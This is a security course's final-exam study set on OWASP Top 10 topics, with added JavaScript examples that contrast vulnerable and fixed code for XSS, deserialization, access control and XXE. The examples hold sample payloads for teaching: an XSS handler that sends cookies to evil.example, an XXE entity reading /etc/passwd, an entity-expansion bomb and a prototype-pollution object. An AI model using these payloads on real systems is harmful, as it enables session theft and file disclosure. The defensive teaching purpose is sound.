CIS 168 Final


Which of the following is true for Reflect XSS?

The malicious script is carried in the request (usually a crafted link) and echoed back by the server in its immediate response, where it runs directly in the victim's browser.

What can lead to insufficient logging and monitoring?

All of the above.

What is considered a best practice when identifying components with known vulnerabilities?

All of the above.

How is insecure serialization used?

All of the answers provided

Why is it so hard to implement access controls properly in the first place?

All of these answers.

Which of the following can lead to sensitive data exposure?

Both are correct.

What is the best source to identify vulnerabilities?

The CVE list maintained by MITRE (the US National Vulnerability Database adds scoring and references on top of it).

What does it mean to "harden" a software environment?

Change default configurations to more secure settings (disable unneeded features, accounts and services, restrict permissions, keep patches current).

What tool is recommended for XSS Protection?

Content Security Policy

What is Serialization?

Converting an in-memory object into a byte stream or text format (JSON, XML, a binary blob) that can be stored or transmitted.

What is Deserialization?

Converting that stored or transmitted data back into an in-memory object; dangerous when the data is attacker-controlled.

What type of attack depends on entering JavaScript into a text area that is intended for users to enter text that will be viewed by other users?

Cross-site scripting (stored, or persistent, XSS: the payload is saved by the server and served to every later viewer).
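Added example, not part of the study set: the stored-XSS case above rendered two ways (untrusted comment concatenated into HTML, then HTML-encoded at output), plus the Content-Security-Policy header recommended as the second layer. The comment text, the `evil.example` host and the nonce are constructed for illustration.

```javascript
'use strict';
// Added example (not from the study set): contextual output encoding for text that
// other users submitted, beside a Content-Security-Policy header. Node.js, no deps.

// Constructed sample: what a hostile user typed into a "comment" text area.
const ATTACKER_COMMENT =
  '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">';

// Vulnerable rendering: untrusted text is concatenated straight into HTML,
// so the attacker's markup becomes part of the page for every viewer.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Escapes the five characters that can change parsing in an HTML text or
// quoted-attribute context. Apply it at the point of output, not on input.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: the same template, but the comment is encoded first,
// so the browser shows the payload as text instead of executing it.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Second layer: a CSP that forbids inline scripts and inline event handlers and
// limits where scripts may load from and where fetch()/XHR may connect.
// The nonce must be generated fresh and randomly for every response.
function cspHeader(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'none'",
    "connect-src 'self'",
  ].join('; ');
}

// Illustration-only check: is there still an element carrying an on* handler?
function containsEventHandler(html) {
  return /<[^>]+\son\w+\s*=/i.test(html);
}

console.log(renderCommentUnsafe(ATTACKER_COMMENT));
console.log(renderCommentSafe(ATTACKER_COMMENT));
console.log('Content-Security-Policy: ' + cspHeader('r4nd0m'));
```

Encoding is the fix; the CSP is what limits the damage when an encoding is missed somewhere, because the injected inline handler has no nonce and the exfiltration fetch() is blocked by connect-src.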

What are the two types of XXE?

Direct and Indirect

What is the best way to defend against XXE?

Disable external entities in your XML parser.

What is the key difference between encryption, hashing, and encoding when securing your sensitive data?

Encryption can be decrypted by whoever holds the right key; hashing is one-way and can only be recomputed and compared, never reversed; encoding has no key at all and anyone can reverse it, so it provides no confidentiality.

What is XML?

Extensible Markup Language

Authentication and authorization both refer to the same concept--access control.

False

Deserialization is the process of converting an object into a data format, something like XML or JSON, with the intent of putting it back together later.

False (that sentence describes serialization; deserialization is the reverse step, turning the data back into an object).
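Added example, not part of the study set: a profile object serialized to JSON and then deserialized two ways. The unsafe deserializer rebuilds the object from whatever keys the data contains, so a constructed payload with a `__proto__` key pollutes Object.prototype; the safe one only copies fields an allowlist schema names. The profile shape, schema and payload are all constructed.

```javascript
'use strict';
// Added example (not from the study set): serialization to JSON, then two ways
// of deserializing it. The "profile" shape and the hostile payload are constructed.

// Serialization: object in memory -> data that can be stored or sent.
function serializeProfile(profile) {
  return JSON.stringify(profile);
}

// What the app expects to rebuild when it deserializes a stored profile.
function defaultProfile() {
  return { name: '', prefs: { theme: 'light' } };
}

// Constructed hostile data. It is valid JSON and looks like a profile, but the
// "__proto__" key is there to be followed by a deserializer that trusts the keys.
const HOSTILE = '{"name":"mallory","prefs":{"theme":"dark"},"__proto__":{"isAdmin":true}}';

// Unsafe deserialization: rebuilds the object from whatever keys the data has.
// Recursing into "__proto__" reaches Object.prototype, so the attacker's
// isAdmin flag appears on every plain object in the process (prototype pollution).
function deepMergeUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && target[key] && typeof target[key] === 'object') {
      deepMergeUnsafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
function deserializeUnsafe(data) {
  return deepMergeUnsafe(defaultProfile(), JSON.parse(data));
}

// Safe deserialization: the data only supplies values for fields the schema
// names, with the types the schema expects; unknown keys are never touched.
const PROFILE_SCHEMA = { name: 'string', prefs: { theme: 'string' } };
function pickBySchema(schema, source) {
  const out = {};
  for (const [key, expected] of Object.entries(schema)) {
    if (!Object.prototype.hasOwnProperty.call(source, key)) continue;
    const value = source[key];
    if (typeof expected === 'object') {
      if (value && typeof value === 'object') out[key] = pickBySchema(expected, value);
    } else if (typeof value === expected) {
      out[key] = value;
    }
  }
  return out;
}
function deserializeSafe(data) {
  return pickBySchema(PROFILE_SCHEMA, JSON.parse(data));
}

// Runs both deserializers on HOSTILE and reports whether an unrelated object
// was affected. The pollution is removed again so the rest of the process is sane.
function demo() {
  const roundTrip = serializeProfile(deserializeSafe(serializeProfile({ name: 'alice', prefs: { theme: 'dark' } })));
  const unsafe = deserializeUnsafe(HOSTILE);
  const pollutedAfterUnsafe = ({}).isAdmin === true;
  delete Object.prototype.isAdmin;
  const safe = deserializeSafe(HOSTILE);
  const pollutedAfterSafe = ({}).isAdmin === true;
  return { roundTrip, unsafeName: unsafe.name, pollutedAfterUnsafe, safe, pollutedAfterSafe };
}

console.log(demo());
```

The same lesson applies to binary formats (Java serialization, Python pickle, .NET BinaryFormatter), where the "keys" are class names and the damage is code execution rather than a polluted prototype: never let the data decide what gets reconstructed.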

If you encrypt application data in motion, you don't need to encrypt that data at rest.

False

The damage an attacker can inflict by exploiting broken access control flaws is likely to be minimal.

False
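Added example, not part of the study set: authentication answers "who is this?" and authorization answers "may they do this to that object?", and the two previous flashcards (authentication vs. authorization; the damage of broken access control) come together in one endpoint. The session table, invoice table and token strings are constructed.

```javascript
'use strict';
// Added example (not from the study set): authentication maps a credential to an
// identity; authorization decides what that identity may do. Data is constructed.

const SESSIONS = new Map([
  ['tok-alice', { id: 1, role: 'user' }],
  ['tok-bob', { id: 2, role: 'user' }],
  ['tok-admin', { id: 99, role: 'admin' }],
]);
const INVOICES = new Map([
  [1001, { owner: 1, amount: 40 }],
  [1002, { owner: 2, amount: 75 }],
]);

// Authentication: map a presented credential to an identity, or nothing.
function authenticate(token) {
  return SESSIONS.get(token) || null;
}

// Authorization: a server-side rule about this user and this object.
// Default deny: only the owner or an admin may read an invoice.
function mayReadInvoice(user, invoice) {
  return user.role === 'admin' || invoice.owner === user.id;
}

// Broken access control: authenticates, then serves any invoice by id.
// Bob can read Alice's invoice just by changing the number in the URL.
function getInvoiceUnsafe(token, invoiceId) {
  const user = authenticate(token);
  if (!user) return { status: 401 };
  const invoice = INVOICES.get(invoiceId);
  if (!invoice) return { status: 404 };
  return { status: 200, invoice };
}

// Fixed: the authorization check runs on every request, and "not yours" gets
// the same 404 as "does not exist" so the endpoint cannot be used to enumerate ids.
function getInvoiceSafe(token, invoiceId) {
  const user = authenticate(token);
  if (!user) return { status: 401 };
  const invoice = INVOICES.get(invoiceId);
  if (!invoice || !mayReadInvoice(user, invoice)) return { status: 404 };
  return { status: 200, invoice };
}

console.log('bob -> 1001 (unsafe):', getInvoiceUnsafe('tok-bob', 1001).status);
console.log('bob -> 1001 (safe):  ', getInvoiceSafe('tok-bob', 1001).status);
```

Why this is hard to get right in practice: the check must be repeated on every route that touches the object, must live on the server (hiding a link in the UI is not access control), and must key on the object's ownership rather than on the caller merely being logged in.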

Approximately how many entries does the US National Vulnerability Database contain?

More than 120,000

Which of the following is true about Stored XSS?

Most difficult to detect

Which of the following is true about DOM-based XSS?

Never requires interaction with the server: the payload is executed by the page's own client-side JavaScript (for example, reading location.hash into innerHTML), so the server never sees it.

Which of the following is not an XSS attack category?

OS-based

What is an Indirect XXE?

Results from requests in which the server itself generates an XML object that is then parsed, rather than the attacker submitting the XML directly.

How is XML similar to HTML?

Tag-based syntax is used.

Which of the following is not a type of cross-site scripting (XSS) flaw?

Transparent

By uploading an XML file that contains hostile content, an attacker could potentially launch multiple attacks from the XML processor that handles the file.

True

Security misconfiguration weaknesses extend beyond the application.

True

Security tools can be used to help assess configurations automatically.

True

The OWASP Top 10 Project is the most mature, most popular project in the OWASP project library.

True

The best way to protect your apps from components with known vulnerabilities is to remove everything you don't need.

True

The ideal setting to test for insufficient logging and monitoring vulnerabilities is a white box testing scenario.

True

What is Direct XXE?

An XML document sent directly to the server whose DTD declares an external entity (a SYSTEM or PUBLIC entity) that the parser then resolves.
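Added example, not part of the study set, covering the XXE cards above (the two types, the defence, the hostile-upload claim and direct XXE): what a direct XXE payload looks like, a pre-parse gate that refuses any document carrying a DTD (the blanket way to disable external entities when the parser offers no switch), and an entity expander with a hard size limit, which is what a parser needs in order to survive nested internal entities. Node.js has no XML parser in its standard library, so the expander is a deliberately small hand-written one; all sample documents are constructed.

```javascript
'use strict';
// Added example (not from the study set): a direct XXE payload, a pre-parse gate
// that refuses any document with a DTD, and a bounded expander for internal
// entities. All sample documents below are constructed.

// Direct XXE: the attacker sends the XML. Its DTD declares an external entity
// that points at a local file and references it where the app echoes content.
const XXE_PAYLOAD = `<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order><item>&xxe;</item></order>`;

// Internal entities only, but nested so that each level multiplies the output.
const LAUGHS = `<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>`;

const SMALL = `<!DOCTYPE a [ <!ENTITY x "hi"> ]><a>&x;&amp;</a>`;
const BENIGN = `<?xml version="1.0"?><order><item>widget</item></order>`;

// Reports whether a DTD is present and which entities it declares.
function inspectXml(xml) {
  const hasDoctype = /<!DOCTYPE\b/i.test(xml);
  const external = [];
  const internal = [];
  for (const m of xml.matchAll(/<!ENTITY\s+(?:%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)?/gi)) {
    (m[2] ? external : internal).push(m[1]);
  }
  return { hasDoctype, external, internal };
}

// Gate: admit only documents with no DTD at all. Rejecting the DTD outright
// removes external entities, parameter entities and expansion bombs together.
function admitXml(xml) {
  const info = inspectXml(xml);
  return { ok: !info.hasDoctype, ...info };
}

// Expands internal entity references in the body under a hard size limit.
// External (SYSTEM/PUBLIC) entities are never fetched and stay as written.
function expandInternalEntities(xml, maxBytes = 1 << 20) {
  const decls = new Map();
  for (const m of xml.matchAll(/<!ENTITY\s+([\w.-]+)\s+"([^"]*)"\s*>/g)) decls.set(m[1], m[2]);
  const dtdEnd = xml.indexOf(']>');
  let body = dtdEnd === -1 ? xml : xml.slice(dtdEnd + 2);
  for (let round = 0; round < 64; round++) {
    let changed = false;
    body = body.replace(/&([\w.-]+);/g, (whole, name) => {
      if (!decls.has(name)) return whole;   // &amp; and friends are left alone
      changed = true;
      return decls.get(name);
    });
    if (body.length > maxBytes) throw new Error(`entity expansion exceeded ${maxBytes} bytes`);
    if (!changed) return body;
  }
  throw new Error('entity expansion did not converge');
}

console.log(admitXml(XXE_PAYLOAD));
console.log(expandInternalEntities(SMALL));
```

With a real parser the equivalent of admitXml is the parser's own feature flag (disallow DOCTYPE declarations, or disable external general and parameter entities); the gate here shows what that flag is protecting against and is a reasonable stopgap in front of a parser you cannot configure.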

It's not enough to simply identify the standards that should be applied in order to harden your software environments. You also have to _____.

ensure those hardening standards are applied each and every time.

